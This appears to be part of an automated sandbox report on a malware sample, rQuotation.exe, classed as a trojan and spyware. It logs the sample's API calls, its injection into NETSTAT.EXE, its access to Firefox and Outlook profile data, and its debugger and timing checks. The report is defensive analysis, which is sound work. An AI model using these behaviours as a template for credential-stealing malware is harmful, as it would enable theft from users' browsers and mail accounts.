              Source: Yara match, File source: 00000005.00000002.3572338314.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match, File source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

              System Summary

              Source: initial sample Static PE information: Filename: rQuotation.exe
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_0086CC93 NtClose,0_2_0086CC93
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702B60 NtClose,LdrInitializeThunk,0_2_01702B60
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702DF0 NtQuerySystemInformation,LdrInitializeThunk,0_2_01702DF0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702C70 NtFreeVirtualMemory,LdrInitializeThunk,0_2_01702C70
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_017035C0 NtCreateMutant,LdrInitializeThunk,0_2_017035C0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01704340 NtSetContextThread,0_2_01704340
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01704650 NtSuspendThread,0_2_01704650
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702BF0 NtAllocateVirtualMemory,0_2_01702BF0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702BE0 NtQueryValueKey,0_2_01702BE0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702BA0 NtEnumerateValueKey,0_2_01702BA0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702B80 NtQueryInformationFile,0_2_01702B80
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702AF0 NtWriteFile,0_2_01702AF0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702AD0 NtReadFile,0_2_01702AD0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702AB0 NtWaitForSingleObject,0_2_01702AB0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702D30 NtUnmapViewOfSection,0_2_01702D30
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702D10 NtMapViewOfSection,0_2_01702D10
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702D00 NtSetInformationFile,0_2_01702D00
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702DD0 NtDelayExecution,0_2_01702DD0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702DB0 NtEnumerateKey,0_2_01702DB0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702C60 NtCreateKey,0_2_01702C60
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702C00 NtQueryInformationProcess,0_2_01702C00
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702CF0 NtOpenProcess,0_2_01702CF0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702CC0 NtQueryVirtualMemory,0_2_01702CC0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702CA0 NtQueryInformationToken,0_2_01702CA0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702F60 NtCreateProcessEx,0_2_01702F60
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702F30 NtCreateSection,0_2_01702F30
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702FE0 NtCreateFile,0_2_01702FE0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702FB0 NtResumeThread,0_2_01702FB0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702FA0 NtQuerySection,0_2_01702FA0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702F90 NtProtectVirtualMemory,0_2_01702F90
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702E30 NtWriteVirtualMemory,0_2_01702E30
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702EE0 NtQueueApcThread,0_2_01702EE0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702EA0 NtAdjustPrivilegesToken,0_2_01702EA0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01702E80 NtReadVirtualMemory,0_2_01702E80
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01703010 NtOpenDirectoryObject,0_2_01703010
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01703090 NtSetValueKey,0_2_01703090
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_017039B0 NtGetContextThread,0_2_017039B0
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01703D70 NtOpenThread,0_2_01703D70
              Source: C:\Users\user\Desktop\rQuotation.exe Code function: 0_2_01703D10 NtOpenProcessToken,0_2_01703D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03344340 NtSetContextThread,LdrInitializeThunk,5_2_03344340
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03344650 NtSuspendThread,LdrInitializeThunk,5_2_03344650
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342B60 NtClose,LdrInitializeThunk,5_2_03342B60
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03342BA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03342BF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03342BE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342AF0 NtWriteFile,LdrInitializeThunk,5_2_03342AF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342AD0 NtReadFile,LdrInitializeThunk,5_2_03342AD0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342F30 NtCreateSection,LdrInitializeThunk,5_2_03342F30
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342FB0 NtResumeThread,LdrInitializeThunk,5_2_03342FB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342FE0 NtCreateFile,LdrInitializeThunk,5_2_03342FE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03342E80
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03342EE0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03342D30
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03342D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03342DF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342DD0 NtDelayExecution,LdrInitializeThunk,5_2_03342DD0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03342C70
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342C60 NtCreateKey,LdrInitializeThunk,5_2_03342C60
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03342CA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_033435C0 NtCreateMutant,LdrInitializeThunk,5_2_033435C0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_033439B0 NtGetContextThread,LdrInitializeThunk,5_2_033439B0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342B80 NtQueryInformationFile,5_2_03342B80
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342AB0 NtWaitForSingleObject,5_2_03342AB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342F60 NtCreateProcessEx,5_2_03342F60
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342FA0 NtQuerySection,5_2_03342FA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342F90 NtProtectVirtualMemory,5_2_03342F90
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342E30 NtWriteVirtualMemory,5_2_03342E30
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342EA0 NtAdjustPrivilegesToken,5_2_03342EA0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342D00 NtSetInformationFile,5_2_03342D00
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342DB0 NtEnumerateKey,5_2_03342DB0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342C00 NtQueryInformationProcess,5_2_03342C00
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342CF0 NtOpenProcess,5_2_03342CF0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03342CC0 NtQueryVirtualMemory,5_2_03342CC0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03343010 NtOpenDirectoryObject,5_2_03343010
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03343090 NtSetValueKey,5_2_03343090
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03343D10 NtOpenProcessToken,5_2_03343D10
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03343D70 NtOpenThread,5_2_03343D70
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02A79A90 NtDeleteFile,5_2_02A79A90
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02A79B30 NtClose,5_2_02A79B30
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02A79830 NtCreateFile,5_2_02A79830
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02A799A0 NtReadFile,5_2_02A799A0
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02A79C90 NtAllocateVirtualMemory,5_2_02A79C90
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 0174F290 appears 103 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 0173EA12 appears 86 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 01717E54 appears 107 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 016BB970 appears 262 times
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: String function: 01705130 appears 58 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 032FB970 appears 262 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03357E54 appears 107 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0338F290 appears 103 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 03345130 appears 58 times
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0337EA12 appears 86 times
              Source: rQuotation.exeStatic PE information: No import functions for PE file found
              Source: rQuotation.exe, 00000000.00000002.2022344447.0000000001961000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.1929221288.000000000144F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs rQuotation.exe
              Source: rQuotation.exe, 00000000.00000003.1931437975.000000000160B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rQuotation.exe
              Source: rQuotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rQuotation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rQuotation.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@13/8
              Source: C:\Windows\SysWOW64\NETSTAT.EXE File created: C:\Users\user\AppData\Local\Temp\x5R95Rwl
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\rQuotation.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: rQuotation.exeReversingLabs: Detection: 71%
              Source: rQuotation.exeVirustotal: Detection: 79%
              Source: unknownProcess created: C:\Users\user\Desktop\rQuotation.exe "C:\Users\user\Desktop\rQuotation.exe"
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\rQuotation.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: snmpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: rQuotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: netstat.pdbGCTL source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstat.pdb source: rQuotation.exe, 00000000.00000003.2021707048.000000000123D000.00000004.00000020.00020000.00000000.sdmp, gAmAZOKQyy.exe, 00000004.00000002.3572470472.0000000001107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gAmAZOKQyy.exe, 00000004.00000000.1946445492.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp, gAmAZOKQyy.exe, 00000006.00000000.2087665206.0000000000B9E000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: rQuotation.exe, rQuotation.exe, 00000000.00000003.1931437975.00000000014DE000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000003.1929221288.000000000132C000.00000004.00000020.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.000000000182E000.00000040.00001000.00020000.00000000.sdmp, rQuotation.exe, 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000005.00000002.3573169632.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573169632.000000000346E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2021924278.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000003.2023759213.0000000003120000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00859092 push es; iretd 0_2_0085915B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008590DF push es; iretd 0_2_0085915B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084A805 push ebx; iretd 0_2_0084A80B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D038 push ebx; iretd 0_2_0084D086
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D053 push ebx; iretd 0_2_0084D086
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008481E7 push ecx; iretd 0_2_008481EB
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00843160 push eax; ret 0_2_00843162
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D977 push ss; iretd 0_2_0084D979
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00855A50 push edx; ret 0_2_00855A5E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00855A53 push edx; ret 0_2_00855A5E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0084D270 push ds; iretd 0_2_0084D27B
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008544B7 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008544D5 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00841CD8 pushad ; retf 0_2_00841CE9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00854457 push ecx; retf 0_2_00854496
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00854E52 push ebp; ret 0_2_00854E59
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_008547B6 push es; retf 0_2_008547B7
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0085272B push esi; ret 0_2_0085272C
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0169225F pushad ; ret 0_2_016927F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016927FA pushad ; ret 0_2_016927F9
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C09AD push ecx; mov dword ptr [esp], ecx0_2_016C09B6
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0169283D push eax; iretd 0_2_01692858
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D225F pushad ; ret 5_2_032D27F9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D27FA pushad ; ret 5_2_032D27F9
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_033009AD push ecx; mov dword ptr [esp], ecx5_2_033009B6
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D283D push eax; iretd 5_2_032D2858
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_032D1368 push eax; iretd 5_2_032D1369
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6A3A0 push edx; ret 5_2_02A6A3BE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6A379 push edx; ret 5_2_02A6A3BE
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A628ED push edx; ret 5_2_02A628FB
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A628F0 push edx; ret 5_2_02A628FB
              Source: rQuotation.exeStatic PE information: section name: .text entropy: 7.9961506950995505
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0170096E rdtsc 0_2_0170096E
              Source: C:\Users\user\Desktop\rQuotation.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7940 Thread sleep count: 43 > 30
              Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 7940 Thread sleep time: -86000s >= -30000s
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe TID: 7956 Thread sleep time: -45000s >= -30000s
              Source: C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe TID: 7956 Thread sleep time: -36000s >= -30000s
              Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_02A6CC20 FindFirstFileW,FindNextFileW,FindClose,5_2_02A6CC20
              Source: gAmAZOKQyy.exe, 00000006.00000002.3572777218.00000000010AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
              Source: NETSTAT.EXE, 00000005.00000002.3572452418.0000000002D9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000007.00000002.2311370622.000001610E07C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
              Source: C:\Program Files\Mozilla Firefox\firefox.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\rQuotation.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_00857CB3 LdrLoadDll,0_2_00857CB3
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01794164 mov eax, dword ptr fs:[00000030h]0_2_01794164
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01758158 mov eax, dword ptr fs:[00000030h]0_2_01758158
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov eax, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01754144 mov ecx, dword ptr fs:[00000030h]0_2_01754144
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016C6154 mov eax, dword ptr fs:[00000030h]0_2_016C6154
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016BC156 mov eax, dword ptr fs:[00000030h]0_2_016BC156
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F0124 mov eax, dword ptr fs:[00000030h]0_2_016F0124
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_01780115 mov eax, dword ptr fs:[00000030h]0_2_01780115
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov ecx, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176A118 mov eax, dword ptr fs:[00000030h]0_2_0176A118
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov eax, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_0176E10E mov ecx, dword ptr fs:[00000030h]0_2_0176E10E
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_016F01F8 mov eax, dword ptr fs:[00000030h]0_2_016F01F8
              Source: C:\Users\user\Desktop\rQuotation.exeCode function: 0_2_017961E5 mov eax, dword ptr fs:[00000030h]0_2_017961E5
